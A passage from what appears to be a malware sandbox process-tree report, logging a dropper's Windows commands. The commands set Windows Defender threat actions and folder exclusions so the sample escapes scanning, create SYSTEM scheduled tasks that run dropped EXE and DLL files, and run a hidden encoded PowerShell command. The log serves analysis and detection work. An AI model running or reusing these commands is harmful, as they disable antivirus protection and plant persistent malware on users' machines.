Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                            2⤵
                                                            • Drops file in System32 directory
                                                            • Modifies data under HKEY_USERS
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4788
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                                PID:4480
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:816
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                    PID:4888
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                    3⤵
                                                                      PID:2384
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:1828
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                          PID:4092
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                          3⤵
                                                                            PID:3948
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:1120
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                                PID:112
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                3⤵
                                                                                  PID:796
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                  3⤵
                                                                                    PID:4336
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                    3⤵
                                                                                      PID:3992
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                      3⤵
                                                                                        PID:4076
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                        3⤵
                                                                                          PID:2680
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:2144
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                          3⤵
                                                                                            PID:4432
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                            3⤵
                                                                                              PID:4456
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                              3⤵
                                                                                                PID:3328
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                3⤵
                                                                                                  PID:1412
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                  3⤵
                                                                                                    PID:1940
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                    3⤵
                                                                                                      PID:4260
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                      3⤵
                                                                                                        PID:2976
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                        3⤵
                                                                                                          PID:2844
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                          3⤵
                                                                                                            PID:4192
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                            3⤵
                                                                                                              PID:4828
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              PID:4684
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                              3⤵
                                                                                                                PID:4648
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:2624
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BJoIZxhjKBkdHsthviR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\BJoIZxhjKBkdHsthviR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LHSdqcBuKngoC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LHSdqcBuKngoC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UxlHwoNwU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UxlHwoNwU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sjazJYTbpqVU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sjazJYTbpqVU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wuFoGWqRRrUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wuFoGWqRRrUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\JuaokLqPZqziZjVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\JuaokLqPZqziZjVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ZhTQaFaBDmtyfHbtF\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ZhTQaFaBDmtyfHbtF\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gCqgzsIdJleQZgeU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gCqgzsIdJleQZgeU\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                2⤵
                                                                                                                • Drops file in System32 directory
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2648
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BJoIZxhjKBkdHsthviR" /t REG_DWORD /d 0 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:3236
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BJoIZxhjKBkdHsthviR" /t REG_DWORD /d 0 /reg:32
                                                                                                                      4⤵
                                                                                                                        PID:1576
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BJoIZxhjKBkdHsthviR" /t REG_DWORD /d 0 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:5044
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LHSdqcBuKngoC" /t REG_DWORD /d 0 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:3224
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wuFoGWqRRrUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:4204
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:5060
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gCqgzsIdJleQZgeU /t REG_DWORD /d 0 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:1740
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ZhTQaFaBDmtyfHbtF /t REG_DWORD /d 0 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:1468
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ZhTQaFaBDmtyfHbtF /t REG_DWORD /d 0 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:5064
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gCqgzsIdJleQZgeU /t REG_DWORD /d 0 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:1852
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:4420
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:644
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:5112
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\JuaokLqPZqziZjVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:3652
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\JuaokLqPZqziZjVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:672
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wuFoGWqRRrUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:4560
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sjazJYTbpqVU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3232
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sjazJYTbpqVU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:1996
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UxlHwoNwU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:516
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UxlHwoNwU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:1404
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LHSdqcBuKngoC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:3124
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /run /I /tn "gdLROAPgV"
                                                                                                                                                        2⤵
                                                                                                                                                          PID:3664
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          schtasks /CREATE /TN "gdLROAPgV" /SC once /ST 01:22:39 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                          2⤵
                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                          PID:3352
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          schtasks /DELETE /F /TN "gdLROAPgV"
                                                                                                                                                          2⤵
                                                                                                                                                            PID:2532
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /CREATE /TN "OyNPSoRSgtYwHEpij" /SC once /ST 02:50:20 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gCqgzsIdJleQZgeU\qlRBUuRhyIJZIwv\yofcuuG.exe\" gi /fpsite_idZWW 385118 /S" /V1 /F
                                                                                                                                                            2⤵
                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                            PID:5064
                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                            schtasks /run /I /tn "OyNPSoRSgtYwHEpij"
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4076
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                            1⤵
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:4664
                                                                                                                                                            • C:\Windows\system32\gpupdate.exe
                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1956
                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                                                                              1⤵
                                                                                                                                                                PID:1372
                                                                                                                                                              • C:\Windows\system32\gpscript.exe
                                                                                                                                                                gpscript.exe /RefreshSystemParam
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:4112
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:3812
                                                                                                                                                                  • C:\Windows\Temp\gCqgzsIdJleQZgeU\qlRBUuRhyIJZIwv\yofcuuG.exe
                                                                                                                                                                    C:\Windows\Temp\gCqgzsIdJleQZgeU\qlRBUuRhyIJZIwv\yofcuuG.exe gi /fpsite_idZWW 385118 /S
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Drops Chrome extension
                                                                                                                                                                    • Drops desktop.ini file(s)
                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                    PID:1180
                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                      schtasks /DELETE /F /TN "bEyYKbsuUozdEyKwWq"
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:3992
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:3352
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                            PID:1120
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:852
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:3044
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\UxlHwoNwU\EWIDST.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "qZVMaGbFbIrmves" /V1 /F
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                              PID:2312
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /CREATE /TN "qZVMaGbFbIrmves2" /F /xml "C:\Program Files (x86)\UxlHwoNwU\ckXpjtT.xml" /RU "SYSTEM"
                                                                                                                                                                              2⤵
                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                              PID:4196
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /END /TN "qZVMaGbFbIrmves"
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:4596
                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3652
                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                  schtasks /DELETE /F /TN "qZVMaGbFbIrmves"
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:1904
                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                    schtasks /CREATE /TN "bWEwnmVnhqclkO" /F /xml "C:\Program Files (x86)\sjazJYTbpqVU2\NUxirFf.xml" /RU "SYSTEM"
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                    PID:3344
                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4420
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /CREATE /TN "gpxcSLvQxBBnt2" /F /xml "C:\ProgramData\JuaokLqPZqziZjVB\IYGZKMq.xml" /RU "SYSTEM"
                                                                                                                                                                                      2⤵
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:4076
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
